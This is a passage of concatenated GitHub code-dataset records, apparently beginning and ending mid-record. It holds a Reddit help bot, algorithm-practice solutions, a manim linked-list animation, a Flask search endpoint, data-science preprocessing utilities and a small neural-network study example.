dict[Reply, str]\n reddit: praw.Reddit\n\n def __init__(self) -> None:\n self.responses = self.loadReplies()\n self.reddit = self.connect()\n\n\n def main(self):\n subreddit = self.reddit.subreddit(CONST_SUBREDDIT)\n for submission in subreddit.stream.submissions(skip_existing=True):\n self.process_submission(submission)\n\n def process_submission(self, submission):\n print(self.responses[Reply.BASE_REPLY])\n if submission.link_flair_text == \"Question\":\n submission.reply(body=self.responses[Reply.BASE_REPLY])\n\n\n def loadReplies(self) -> dict[Reply, str]:\n response: dict[Reply, str] = {}\n\n with open('replies/baseReply.md', 'r') as baseReply:\n baseReplyText = baseReply.read()\n response[Reply.BASE_REPLY] = baseReplyText\n \n return response\n\n def connect(self) -> praw.Reddit:\n return praw.Reddit(\n client_id=os.getenv(CONST_CLIENT_ID_ENV),\n client_secret=os.getenv(CONST_CLIENT_SECRET_ENV),\n redirect_uri=\"https://github.com/LanguageLatte/public\",\n password=os.getenv(CONST_PASSWORD_ENV),\n user_agent=CONST_USER_AGENT,\n username=CONST_USERNAME,\n )\n\nif __name__ == \"__main__\":\n ankiHelpBot = AnkiHelpBot()\n ankiHelpBot.main()","repo_name":"LanguageLatte/public","sub_path":"AnkiHelpBot/AnkiHelpBot.py","file_name":"AnkiHelpBot.py","file_ext":"py","file_size_in_byte":1476,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"67"} +{"seq_id":"70639444375","text":"'''\r\n1로 만들기\r\nhttps://www.acmicpc.net/problem/1463\r\n'''\r\nN = int(input())\r\n\r\ndp = [0] * (N+4) # 숫자 N일때의 답을 해당 인덱스에 삽입\r\ndp[2] = 1\r\ndp[3] = 1\r\ndp[4] = 2\r\nfor n in range(5, N+1): # 5부터 bottom-up으로 dp 계산\r\n op_a = 0 # 연산 1 플래그\r\n if n % 3 == 0:\r\n op_a = 1\r\n\r\n op_b = 0 # 연산 2 플래그\r\n if n % 2 == 0:\r\n op_b = 1\r\n\r\n op_flag = (op_a, op_b, 1) # 연산 1, 2, 3 플래그\r\n if op_flag == (1, 1, 1):\r\n dp[n] = min(dp[n//3] + 1, dp[n//2] + 1, dp[n-1] + 1)\r\n elif op_flag == (1, 0, 1):\r\n dp[n] = min(dp[n//3] + 1, dp[n-1] + 1)\r\n elif op_flag == (0, 1, 1):\r\n dp[n] = min(dp[n//2] + 1, dp[n-1] + 1)\r\n elif op_flag == (0, 0, 1):\r\n dp[n] = dp[n-1] + 1\r\n\r\nprint(dp[N])\r\n\r\n\r\n\r\n###\r\n# 테스트케이스 참고(https://www.acmicpc.net/board/view/49959)\r\n\r\n''' DFS 연습\r\ndef dfs(n):\r\n global answer, cnt\r\n\r\n if n < 1:\r\n return\r\n elif n == 1:\r\n answer = min(cnt, answer)\r\n\r\n return\r\n else:\r\n for o in op:\r\n if o == 'a' and n % 3 == 0:\r\n cnt += 1\r\n dfs(n // 3)\r\n cnt -= 1\r\n elif o == 'b' and n % 2 == 0:\r\n cnt += 1\r\n dfs(n // 2)\r\n cnt -= 1\r\n else:\r\n cnt += 1\r\n dfs(n - 1)\r\n cnt -= 1\r\n\r\n\r\nN = int(input())\r\n\r\ncnt = 0\r\nanswer = sys.maxsize\r\nop = ['a', 'b', 'c']\r\ndfs(N)\r\n\r\nprint(answer)\r\n'''\r\n","repo_name":"buyeolim/ps_prac","sub_path":"BOJ/python3/1463.py","file_name":"1463.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"20271338661","text":"# See 'Leetcode 206. 
Reverse Linked List' for practice\n\nfrom manim import *\n\nfrom src.list_utilities.LinkedList import LinkedList\nfrom src.list_utilities.Node import Node, NoneNode\n\n\nclass ReverseList(Scene):\n def construct(self):\n title = MarkupText(\"Reverse linked list\", font_size=45).shift(UP * 3)\n self.add(title)\n\n self.show_task(title)\n self.show_reverse_list_code(title)\n\n orig_nodes = [Node(str(j)) for j in range(1, 4)]\n orig_list = LinkedList(nodes=orig_nodes)\n self.play(FadeIn(orig_list.visual_list))\n self.wait(1)\n\n none_start = NoneNode()\n none_start.set_next(orig_list.head)\n none_end = NoneNode()\n orig_list.tail.set_next(none_end)\n self.show_none_start_end(orig_list, none_start, none_end)\n\n self.reverse_list(none_start, orig_list.head)\n self.play(FadeOut(none_start.vn_arrows.vnode.group),\n FadeOut(orig_list.head.vn_arrows.left_arrow))\n self.wait(2)\n\n def show_task(self, title: MarkupText) -> None:\n orig_nodes = [Node(str(j)) for j in range(1, 4)]\n orig_list = LinkedList(nodes=orig_nodes)\n\n rev_nodes = [Node(str(j)) for j in range(3, 0, -1)]\n rev_list = LinkedList(nodes=rev_nodes)\n\n down_arrow = MathTex(r\"\\Downarrow\", color=WHITE)\n result = VGroup(orig_list.visual_list, down_arrow, rev_list.visual_list)\\\n .arrange(DOWN, buff=0.5).next_to(title, DOWN * 5)\n self.play(FadeIn(result, run_time=3))\n self.wait(2)\n self.play(FadeOut(result))\n\n def show_reverse_list_code(self, title: MarkupText) -> None:\n code = '''\n prev, cur = None, head\n while cur:\n next_node = cur.next\n cur.next = prev\n prev, cur = cur, next_node\n return prev\n '''\n rendered_code = Code(code=code, tab_width=4, insert_line_no=False,\n language=\"Python\", font=\"Monospace\", font_size=14)\\\n .next_to(title, RIGHT * 2)\n self.play(Create(rendered_code))\n\n def show_none_start_end(self, list_: LinkedList, start: Node, end: Node) -> None:\n end.vn_arrows.group.next_to(list_.visual_list, RIGHT)\n start.vn_arrows.group.next_to(list_.visual_list, LEFT)\n self.play(FadeIn(end.vn_arrows.group, run_time=2))\n\n start.vn_arrows.remove_arrow()\n self.play(FadeIn(start.vn_arrows.group, run_time=2))\n self.wait(1)\n\n def reverse_list(self, none_node: Node, head: Node) -> Node:\n prev, cur = none_node, head\n tp = TextPointers(prev, cur, self)\n self.wait(0.8)\n\n while not cur.is_none:\n next_node = cur.next\n move_arrow(prev, cur, self)\n cur.next = prev\n tp.move_prev_cur()\n prev, cur = cur, next_node\n tp.update_next(cur)\n self.wait(0.8)\n\n self.play(FadeOut(tp.cur, cur.vn_arrows.group), tp.get_prev_to_cur_transform())\n self.wait(0.5)\n return prev\n\n\ndef move_arrow(prev: Node, cur: Node, scene: Scene) -> None:\n scene.wait(0.8)\n prev.vn_arrows.flip_arrow()\n scene.play(CounterclockwiseTransform(cur.vn_arrows.right_arrow, prev.vn_arrows.right_arrow))\n cur.vn_arrows.set_right_to_left_arrow()\n cur.vn_arrows.set_right_arrow()\n\n\nclass TextPointers:\n def __init__(self, prev: Node, cur: Node, scene: Scene) -> None:\n self.__font_size = 18\n self.__prev = Text(\"prev\", font_size=self.__font_size)\n self.__cur = Text(\"cur\", font_size=self.__font_size)\n self.__next = Text(\"next\", font_size=self.__font_size)\n self.scene = scene\n\n self.__prev.next_to(prev.vn_arrows.vnode.group, DOWN)\n self.__cur.next_to(cur.vn_arrows.vnode.group, DOWN)\n if cur.next:\n self.__next.next_to(cur.next.vn_arrows.vnode.group, DOWN)\n self.scene.play(FadeIn(self.__prev, self.__cur))\n\n @property\n def cur(self) -> Text:\n return self.__cur\n\n def move_prev_cur(self) -> None:\n 
self.__prev.generate_target()\n self.__prev.target.move_to(self.__cur)\n\n self.__cur.generate_target()\n self.__cur.target.move_to(self.__next)\n\n self.scene.play(MoveToTarget(self.__prev), MoveToTarget(self.__cur))\n self.scene.wait(1)\n\n def update_next(self, cur: Node) -> None:\n if cur.next:\n self.__next.next_to(cur.next.vn_arrows.vnode.group, DOWN)\n\n def get_prev_to_cur_transform(self) -> Transform:\n head_text = Text(\"head\", font_size=self.__font_size).shift(self.__prev.get_center())\n return Transform(self.__prev, head_text)\n","repo_name":"andreysmykov/algorithms_animation","sub_path":"src/reverse_linked_list/reverse_list.py","file_name":"reverse_list.py","file_ext":"py","file_size_in_byte":4646,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"25144537282","text":"import app\nimport logging\n\nfrom flask import jsonify\nfrom flask_restplus import Resource\nfrom .models import Search\n\nLOG = logging.getLogger(__name__)\napi = Search.api \n\n@api.route('//')\nclass Search(Resource):\n @api.doc(\"search\")\n def get(self,c_type, tag):\n result = []\n if c_type == \"company\":\n search_resp = app.App.mongodb.db.company.find( { '$text': { '$search': tag } } ).sort('_id')\n \n elif c_type == \"customer\":\n search_resp = app.App.mongodb.db.customer.find( { '$text': { '$search': tag } } ).sort('_id')\n \n for doc in search_resp:\n result.append(doc)\n\n return jsonify(result)","repo_name":"venkaiaha/Sree-app-flask","sub_path":"app/api/search/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"3329038158","text":"#Input de dados\nd = float(input(\"Digite a distância percorrida pelo usuário(km):\"))\nt = int(input(\"Digite o número de dias do aluguel:\"))\n#Dados armazenados\nP = 60\np = 0.15\n#Cálculo do pagamento\nV = (P*t) + (p*d)\n#Output\nprint(\"Valor a pagar: R$ %5.2f\" % V)","repo_name":"axelife2021/Python","sub_path":"Capítulo 3/ex3.14.py","file_name":"ex3.14.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"13264873269","text":"import pandas as pd\nfrom sklearn.feature_selection import RFE\nimport copy\nimport numpy as np\nimport warnings\nimport numpy as np\nfrom sklearn.impute import SimpleImputer\nimport matplotlib.pyplot as plt\nimport yaml\n\n\ndef add_binary_where_the_nan_was(table, column):\n \"\"\"takes the table and next to each columnputs information whether there was a nan\"\"\"\n table[f'bool_nan_{column}'] = table[column].isna()\n return table\n\n\ndef get_rid_of_outliers(table, column):\n up, low = np.percentile(table[column], [1, 99])\n y = np.clip(table[column], up, low)\n # pd.Series(y).hist(bins=30)\n table = table.drop(columns=[column])\n table[f'no_outliers_{column}'] = pd.Series(y)\n return table\n\n\ndef WoE_for_categorical_values(table, column, ret_woe=False):\n \"\"\"\n takes a table, with a categorical value in columns and returns WOE and IV for that variable\n \"\"\"\n\n different_values = table[column].unique().shape[0]\n list_of_bads = [0] * different_values # in each element of a list it contains woe for a corresponding interval\n list_of_goods = [0] * different_values\n for i in range(len(table[str(column)])): # iterate over every sample\n # print(i)\n for j in range(different_values): # how many separate values are there to deal with\n if 
table[column][i] == table[column].unique()[j] and table['target'][i] == 1: # default is an event here\n                list_of_bads[j] += 1\n            elif table[column][i] == table[column].unique()[j] and table['target'][i] == 0:\n                list_of_goods[j] += 1\n\n    total_bads = table.target.sum()\n    total_goods = len(table.target) - total_bads\n    distr_goods = []\n    distr_bads = []\n    WoE = []\n\n    for i in range(len(list_of_goods)):\n        distr_goods.append(list_of_goods[i] / total_goods)\n        distr_bads.append(list_of_bads[i] / total_bads)\n\n    # check whether there are no groups with 0 counts for good or bad - if there are drop the columns with that variable\n    # all together\n    flag = False\n    if 0 in distr_goods or 0 in distr_bads:\n        print("In at least one of the bins there is either no goods or bads distribution. Dropping that variable")\n        flag = True\n\n    for i in range(len(list_of_goods)):\n        WoE.append(np.log(distr_goods[i] / distr_bads[i]) * 100)\n\n    # how many is nan and is default\n    distr_bads_nans = table['target'][table[column].isna()].sum()/total_bads\n    # how many is nan and is not default\n    distr_goods_nans = (table['target'][table[column].isna()].shape[0] - \\\n                        table['target'][table[column].isna()].sum())/total_goods\n    WoE_nan = np.log(distr_goods_nans / distr_bads_nans) * 100\n    WoE.insert(0, WoE_nan) # inserting the value corresponding to NaNs in the first place\n\n    # Information Value of the whole characteristic\n    differences = [distr_goods[i] - distr_bads[i] for i in range(len(distr_goods))]\n    differences.insert(0, distr_goods_nans-distr_bads_nans)\n    IV = np.dot(differences, np.transpose(WoE))\n\n    if ret_woe and not flag:\n        return WoE, IV\n    elif not ret_woe and not flag:\n        return IV\n    elif flag:\n        return table.drop(columns=[column])\n# consider correlation for all continuous data\n\n\ndef drop_columns_with_many_nans(table, threshold=0.2):\n    \"\"\"drops columns that contain over 20% of nan values\"\"\"\n    for col in table.columns:\n        if table[col].isna().sum() >= threshold * table[col].shape[0]:\n            table = table.drop(columns=[col])\n    return table\n\n\ndef woe_and_iv_continuous_data(table, column, number_of_bins, ret_woe=False):\n    \"\"\"assumes that target is provided in column 'target'\n    1 - event, ie default\n    0 - no default\n    returns bins, woe - tuples, iv - scalar\n    \"\"\"\n\n    bins = pd.qcut(table[str(column)], number_of_bins, retbins=True)[1]\n    # bins = pd.cut(table[str(column)], number_of_bins, retbins=True)[1]\n    bins[-1] += 1 # to include all points\n    list_of_bads = [0] * number_of_bins # in each element of a list it contains woe for a corresponding interval\n    list_of_goods = [0] * number_of_bins\n    for i in range(len(table[str(column)])):\n        for j in range(number_of_bins):\n            if bins[j] <= table[column][i] < bins[j+1] and table['target'][i] == 1: # default is an event here\n                list_of_bads[j] += 1\n            elif bins[j] <= table[column][i] < bins[j+1] and table['target'][i] == 0:\n                list_of_goods[j] += 1\n\n\n    # WoE = ln(distr_goods / distr_bads) * 100\n\n    total_bads = table.target.sum() # bad = default\n    total_goods = len(table.target) - total_bads\n    distr_goods = []\n    distr_bads = []\n    WoE = []\n\n    for i in range(len(list_of_goods)):\n        distr_goods.append(list_of_goods[i] / total_goods)\n        distr_bads.append(list_of_bads[i] / total_bads)\n\n    # check whether there are no groups with 0 counts for good or bad\n\n    if 0 in distr_goods or 0 in distr_bads:\n        warnings.warn("In at least one of the bins there is either no goods or bads distribution. 
Check the binning\")\n        exit()\n\n    for i in range(len(list_of_goods)):\n        WoE.append(np.log(distr_goods[i] / distr_bads[i]) * 100)\n\n    # group also nans\n    # how many is nan and is default\n    distr_bads_nans = table['target'][table[column].isna()].sum()/total_bads\n    # how many is nan and is not default\n    distr_goods_nans = (table['target'][table[column].isna()].shape[0] - \\\n                        table['target'][table[column].isna()].sum())/total_goods\n    # WoE_nan = np.log(distr_goods_nans / distr_bads_nans) * 100\n    # WoE.insert(0, WoE_nan) # inserting the value corresponding to NaNs in the first place\n\n    # Information Value of the whole characteristic\n    differences = [distr_goods[i] - distr_bads[i] for i in range(len(distr_goods))]\n    # differences.insert(0, distr_goods_nans-distr_bads_nans)\n    IV = np.dot(differences, np.transpose(WoE))\n\n    if ret_woe:\n        return bins, WoE, IV\n    else:\n        return IV/100\n\n\ndef input_missing_values(table, column, median=True, mode=False):\n    if median:\n        imp_mean = SimpleImputer(missing_values=np.nan, strategy='median')\n    elif mode:\n        imp_mean = SimpleImputer(missing_values=np.nan, strategy='most_frequent')\n\n    imp_mean.fit(table[column].values.reshape(-1, 1))\n    table[column] = imp_mean.transform(table[column].values.reshape(-1, 1))\n    return table\n\n\ndef correlation(dataset, threshold=0.6):\n    # deals only with numeric data, float64 and int64, so here the values\n\n    col_corr = set() # Set of all the names of deleted columns\n    corr_matrix = dataset.corr()\n    for i in range(len(corr_matrix.columns)):\n        for j in range(i):\n            if (corr_matrix.iloc[i, j] >= threshold) and (corr_matrix.columns[j] not in col_corr):\n                colname = corr_matrix.columns[i] # getting the name of column\n                col_corr.add(colname)\n                if colname in dataset.columns:\n                    del dataset[colname] # deleting the column from the dataset\n    print(col_corr)\n    return dataset\n\n\ndef exclude_data_few_unique_values(dataset):\n    \"\"\"drops columns that have either 0 distinct values (NANS) or only 1 distinct value\"\"\"\n    col_to_drop = []\n\n    for column in dataset.columns:\n        if dataset[column].nunique() == 1 or dataset[column].nunique() == 0:\n            col_to_drop.append(column)\n\n    for column in col_to_drop:\n        dataset = dataset.drop(columns=column)\n\n    return dataset\n\n\ndef split_dataset(table):\n    \"\"\"categorical features object,\n    numerical - float64\n    ordinal - int64, the distinction between categorical and ordinal is to be looked into\"\"\"\n    table_categorical = table.select_dtypes('object')\n    table_numerical = table.select_dtypes('float64')\n    table_ordinal = table.select_dtypes('int64')\n    return table_numerical, table_categorical, table_ordinal\n\n\ndef bin_dataset(table, column):\n    \"\"\" bins numerical value\"\"\"\n    if column != 'target':\n        return pd.qcut(table[column], 4)\n\n\ndef drop_duplicated_ones_and_values_leaking_data_from_the_future(table):\n    list_to_drop = ['id', 'member_id', 'url', 'emp_title', 'issue_d', 'funded_amnt', 'funded_amnt_inv',\n                    'sub_grade', 'int_rate', 'addr_state', 'out_prncp', 'out_prncp_inv', 'total_pymnt',\n                    'total_pymnt_inv', 'total_rec_prncp', 'total_rec_int', 'total_rec_late_fee', 'recoveries',\n                    'collection_recovery_fee', 'last_pymnt_d', 'last_pymnt_amnt', 'zip_code',\n                    'earliest_cr_line', 'next_pymnt_d', 'last_credit_pull_d', 'disbursement_method', 'delinq_amnt',\n                    'open_rv_24m']\n\n    for column in list_to_drop:\n        try: # as some of these columns might already have been dropped\n            table = table.drop(columns=column)\n        except KeyError:\n            pass\n    return table\n\n\ndef look_at_value_distribution(table, 
columns):\n \"\"\"for later stage of analysis, to manually exclude data that has very few examples of some values\"\"\"\n print(table[columns].value_counts())\n\n\ndef fill_nans(table, column): # only after values with too many nans were excluded\n return table[column].fillna(\"MISSING\")\n\n\ndef calculate_woe_iv(dataset, feature):\n lst = []\n for i in range(dataset[feature].nunique()):\n val = list(dataset[feature].unique())[i]\n lst.append({\n 'Value': val,\n 'All': dataset[dataset[feature] == val].count()[feature],\n 'Good': dataset[(dataset[feature] == val) & (dataset['target'] == 0)].count()[feature],\n 'Bad': dataset[(dataset[feature] == val) & (dataset['target'] == 1)].count()[feature]\n })\n\n dset = pd.DataFrame(lst)\n dset['Distr_Good'] = dset['Good'] / dset['Good'].sum()\n dset['Distr_Bad'] = dset['Bad'] / dset['Bad'].sum()\n dset['WoE'] = np.log(dset['Distr_Good'] / dset['Distr_Bad'])\n dset = dset.replace({'WoE': {np.inf: 0, -np.inf: 0}})\n dset['IV'] = (dset['Distr_Good'] - dset['Distr_Bad']) * dset['WoE']\n iv = dset['IV'].sum()\n\n dset = dset.sort_values(by='WoE')\n\n return dset, iv\n\n\ndef conc_tables(t1, t2, t3): # concatenates tables\n return pd.concat([t1, t2, t3])\n\n\n\ndef std_test_as_train(X_train, X_test):\n from sklearn.preprocessing import StandardScaler\n\n for col in X_train.columns:\n scaler = StandardScaler()\n scaler.fit(X_train[col].to_numpy().reshape(-1, 1))\n X_train[col] = scaler.transform(X_train[col].to_numpy().reshape(-1, 1))\n X_test[col] = scaler.transform(X_test[col].to_numpy().reshape(-1, 1))\n return X_train, X_test\n\n\ndef stack(X_train, y_train, X_test, y_test):\n from sklearn.linear_model import LogisticRegression\n from vecstack import stacking\n from sklearn import svm\n import xgboost as xgb\n from sklearn.metrics import roc_auc_score, classification_report, f1_score\n\n models = [LogisticRegression(), svm.SVC(), xgb.XGBClassifier(n_jobs=-1)]\n\n S_train, S_test = stacking(models, X_train, y_train, X_test, regression=False, verbose=2)\n\n model = xgb.XGBClassifier(seed=0, n_jobs=-1, learning_rate=0.1,n_estimators=100, max_depth=3)\n\n # Fit 2-nd level model\n model = model.fit(S_train, y_train)\n\n # Predict\n y_pred = model.predict(S_test)\n\n # Final prediction score\n print('Final prediction score: [%.8f]' % f1_score(y_test, y_pred))\n print(classification_report(y_test, y_pred))\n print(roc_auc_score(y_test, y_pred))\n\n\ndef stack_regression(X_train, y_train, X_test, y_test):\n from sklearn.linear_model import LinearRegression\n from vecstack import stacking\n from sklearn import linear_model\n import xgboost as xgb\n from sklearn.metrics import mean_squared_error, mean_absolute_error\n\n models = [linear_model.SGDRegressor(max_iter=1000, tol=1e-3), LinearRegression(), xgb.XGBRegressor(n_jobs=-1)]\n\n S_train, S_test = stacking(models, X_train, y_train, X_test, regression=False, verbose=2)\n\n model = xgb.XGBRegressor(seed=0, n_jobs=-1, learning_rate=0.1,n_estimators=100, max_depth=3)\n\n # Fit 2-nd level model\n model = model.fit(S_train, y_train)\n\n # Predict\n y_pred = model.predict(S_test)\n\n\n print(mean_squared_error(y_test, y_pred))\n\n\ndef upsample_data(X_train, y_train):\n\n from imblearn.over_sampling import SMOTE\n sm = SMOTE(random_state=42)\n X_res, y_res = sm.fit_resample(X_train, y_train)\n return X_res, y_res\n\n\n\"\"\"for later\"\"\"\ndef bayes_optim(X_train, X_test, y_train, y_test):\n\n from bayes_opt import BayesianOptimization\n from sklearn.ensemble import RandomForestClassifier\n from 
sklearn.model_selection import cross_val_score\n\n    def bayesian_optimization(X_train, X_test, y_train, y_test, function, parameters):\n        n_iterations = 10\n        gp_params = {\"alpha\": 1e-4}\n        BO = BayesianOptimization(function, parameters)\n        BO.maximize(n_iter=n_iterations, **gp_params)\n\n        return BO.max\n\n\n    def rfc_optimization(cv_splits):\n        def function(n_estimators, max_depth, min_samples_split):\n            return cross_val_score(\n                RandomForestClassifier(\n                    n_estimators=int(max(n_estimators, 0)),\n                    max_depth=int(max(max_depth, 1)),\n                    min_samples_split=int(max(min_samples_split, 2)),\n                    n_jobs=-1,\n                    random_state=42,\n                    class_weight=\"balanced\"),\n                X=X_train,\n                y=y_train,\n                cv=cv_splits,\n                scoring=\"f1_macro\",\n                n_jobs=-1).mean()\n\n        parameters = {\"n_estimators\": (10, 1000),\n                      \"max_depth\": (1, 150),\n                      \"min_samples_split\": (2, 10)}\n\n        return function, parameters\n\n    # Train model\n    def train(X_train, y_train, X_test, y_test, function, parameters):\n        cv_splits = 4\n\n        best_solution = bayesian_optimization(X_train, X_test, y_train, y_test, function, parameters)\n        params = best_solution[\"params\"]\n\n        model = RandomForestClassifier(\n            n_estimators=int(max(params[\"n_estimators\"], 0)),\n            max_depth=int(max(params[\"max_depth\"], 1)),\n            min_samples_split=int(max(params[\"min_samples_split\"], 2)),\n            n_jobs=-1,\n            random_state=42,\n            class_weight=\"balanced\")\n\n        model.fit(X_train, y_train)\n\n        return model\n\n    function, parameters = rfc_optimization(10)\n    print(train(X_train, y_train, X_test, y_test, function, parameters))\n\n\ndef encode_ordinal_category_encoders(table):\n    import category_encoders\n    for col in table.columns:\n        if str(col)[:7] != 'encoded':\n            encode = category_encoders.ordinal.OrdinalEncoder()\n            encode.fit(table[col])\n            table[f'encoded_ordinal{col}'] = encode.transform(table[col])\n    return table\n\n\ndef encode_ordinal_sklearn(table, col):\n    from sklearn.preprocessing import OrdinalEncoder\n    enc = OrdinalEncoder()\n    enc.fit(table[col].values.reshape(-1, 1))\n    table[f'ordinal_encoded_{col}'] = enc.transform(table[col].values.reshape(-1, 1))\n    return table\n\n\ndef encode_categorical_TargetEncoder(table, y):\n    import category_encoders\n    for col in table.columns:\n        if str(col)[:7] != 'encoded':\n            encode = category_encoders.target_encoder.TargetEncoder()\n            encode.fit(table[col], y)\n            table[f'encoded_target{col}'] = encode.transform(table[col])\n    return table\n\n\ndef drop_cat_not_encoded(table):\n    \"\"\"drops non encoded categorical columns\"\"\"\n    for col in table.columns:\n        if str(col)[:7] != 'encoded':\n            table = table.drop(columns=[col])\n    return table\n\n\ndef fit_xgboost(X, y, upsample=True):\n    from sklearn.metrics import roc_auc_score, classification_report, f1_score\n    import xgboost as xgb\n\n    model = xgb.XGBClassifier(seed=0, n_jobs=-1, learning_rate=0.1,\n                              n_estimators=10, max_depth=5)\n\n    # Fit model\n    if upsample:\n        X_res, y_res = upsample_data(X, y)\n        X_train, X_test, y_train, y_test = train_test_split(X_res, y_res)\n        model = model.fit(X_train, y_train)\n    else:\n        X_train, X_test, y_train, y_test = train_test_split(X, y)\n        model = model.fit(X_train, y_train)\n\n\n    # Predict\n    y_pred = model.predict(X_test)\n    print('f1:\\t\\n', f1_score(y_test, y_pred))\n    print('roc_auc_score:\\t\\n', roc_auc_score(y_test, y_pred))\n    print(classification_report(y_test, y_pred))\n    return model\n\n\ndef date_feature(date):\n    \"\"\"number of month, day of week, vacation, assuming US vacations\"\"\"\n    from dateutil import parser\n    import holidays\n    us_holidays = 
holidays.UnitedStates()\n datetime_obj = parser.parse(date)\n weekday = datetime_obj.weekday() # 0 is monday\n month = datetime_obj.month\n year = datetime_obj.year\n is_holiday = datetime_obj in us_holidays or weekday==6 or weekday==5 # includes weekends as holidays\n return weekday, month, year, int(is_holiday)\n\n\ndef mean_encoding(table, column, target, drop=False):\n \"\"\"assumes no nans\"\"\"\n \"\"\"assumes target is a column in table\"\"\"\n table[f'mean_encoded_{column}'] = table[column].map(table.iloc[table.index].groupby(column)[target].mean())\n if drop:\n table = table.drop(columns=[column])\n return table\n\n\ndef frequency_encode(table, column, drop=False):\n \"\"\"assumes no nans\"\"\"\n encoding = table.groupby(column).size()\n encoding = encoding / table.shape[0]\n table[f'freq_enc_{column}'] = table[column].map(encoding)\n if drop:\n table = table.drop(columns=[column])\n return table\n\n\ndef kfold_mean_encoding(table, column, target, nfolds=5):\n\n from sklearn.model_selection import KFold\n\n skf = KFold(nfolds, shuffle=False)\n\n for tr_ind, val_ind in skf.split(table[column]):\n\n X_tr, X_val = table[[column, target]].iloc[tr_ind], table[[column, target]].iloc[val_ind]\n\n table[column].iloc[val_ind] = table[column].iloc[val_ind].map(X_tr.groupby(column)[target].mean())\n\n table[column] = table[column].fillna(table[target].mean())\n\n return table\n\n\ndef train_test_split(X, y, test_size=0.2):\n from sklearn.model_selection import train_test_split\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=test_size, random_state=42)\n return X_train, X_test, y_train, y_test\n\n\ndef log_transform(table, column, drop=True):\n table[f'log_{column}'] = pd.Series(np.log(1 + table[column]))\n if drop:\n table = table.drop(columns=[column])\n return table\n\n\ndef remove_duplicates(table):\n return table.drop_duplicates()\n\n\ndef compare_data_distributions(table1, table2):\n \"\"\"This is a two-sided test for the null hypothesis that 2 independent samples are drawn from the same\n continuous distribution. 
\"\"\"\n from scipy import stats\n pvalue = stats.ks_2samp(table1, table2)[1]\n if pvalue > .10:\n return True\n else:\n return False\n\n\n","repo_name":"MateuszLewandowski1/mateusz.h.lewandowski-gmail.com","sub_path":"utils_ds.py","file_name":"utils_ds.py","file_ext":"py","file_size_in_byte":18925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"1110640887","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\n\nclass Solution:\n def mergeKLists(self, lists: List[Optional[ListNode]]) -> Optional[ListNode]:\n if len(lists) == 0:\n return None\n\n if len(lists) > 1:\n temp = None\n for i in range(1,len(lists)):\n list1 = lists[0]\n list2 = lists[i]\n\n lists[0] = self.mergeList(list1, list2)\n \n return lists[0] \n\n def mergeList(self, list1: [ListNode], list2: [ListNode]) -> Optional[ListNode]:\n node = ListNode()\n tail = node\n\n while list1 and list2:\n if list1 and list2:\n if list1.val < list2.val:\n tail.next = list1\n list1 = list1.next\n\n else:\n tail.next = list2\n list2 = list2.next\n\n tail = tail.next\n \n if list1 or list2:\n tail.next = list1 if list1 else list2\n \n return node.next\n\n\n# class Solution:\n# def mergeKLists(self, lists: List[Optional[ListNode]]) -> Optional[ListNode]:\n# if not lists:\n# return None\n# if len(lists) == 1:\n# return lists[0]\n# mid = len(lists) // 2\n# l, r = self.mergeKLists(lists[:mid]), self.mergeKLists(lists[mid:])\n# return self.merge(l, r)\n \n# def merge(self, l, r):\n# dummy = p = ListNode()\n# while l and r:\n# if l.val < r.val:\n# p.next = l\n# l = l.next\n# else:\n# p.next = r\n# r = r.next\n# p = p.next\n# p.next = l or r\n# return dummy.next\n \n","repo_name":"tayyab-tariq/Leetcode","sub_path":"Merge k Sorted Lists.py","file_name":"Merge k Sorted Lists.py","file_ext":"py","file_size_in_byte":1839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"34352783806","text":"\"\"\"\n Predicting on predictions (NN's can be stacked)\n\"\"\"\n\n\ndef w_sum(a, b):\n assert len(a) == len(b)\n output = 0\n for i in range(len(a)):\n output += (a[i] * b[i])\n return output\n\n# VECTOR MATRIX MULTIPLICATION\ndef vect_mat_mul(vect, matrix):\n # For each output we are performing a weighted sum of inputs\n # this function iterates through each row of weigths and makes\n # a prediction using w_sum\n assert len(vect) == len(matrix)\n\n output = [0, 0, 0]\n\n for i in range(len(vect)):\n output[i] = w_sum(vect, matrix[i])\n\n return output\n\n # toes wins fans\nih_wgt = [\n [0.1, 0.2, -0.1], # hid[0]\n [-0.1, 0.1, 0.9], # hid[1]\n [0.1, 1.4, 0.1] # hid[2]\n]\n\n # hid[0] hid[1] hid[2]\nhp_wgt = [\n [0.3, 1.1, -0.3], # hurt?\n [0.1, 0.2, 0.0], # win?\n [0.0, 1.3, 0.1] # sad?\n]\n\n\ndef neural_network(input, weights):\n hid = vect_mat_mul(input, weights[0])\n pred = vect_mat_mul(hid, weights[1])\n return pred\n\n\nweights = [ih_wgt, hp_wgt]\n\ntoes = [8.5, 9.5, 9.9, 9.0]\nwlrec = [0.64, 0.8, 0.8, 0.9]\nnfans = [1.2, 1.3, 0.5, 1.0]\n\ninput = [toes[0], wlrec[0], nfans[0]]\npredictions = neural_network(input, weights)\nprint(predictions)\n","repo_name":"charliecharlieO-o/grokking-nn-study","sub_path":"chapter3/ex5.py","file_name":"ex5.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"45336172237","text":"# -*- coding: utf-8 -*-\nimport 
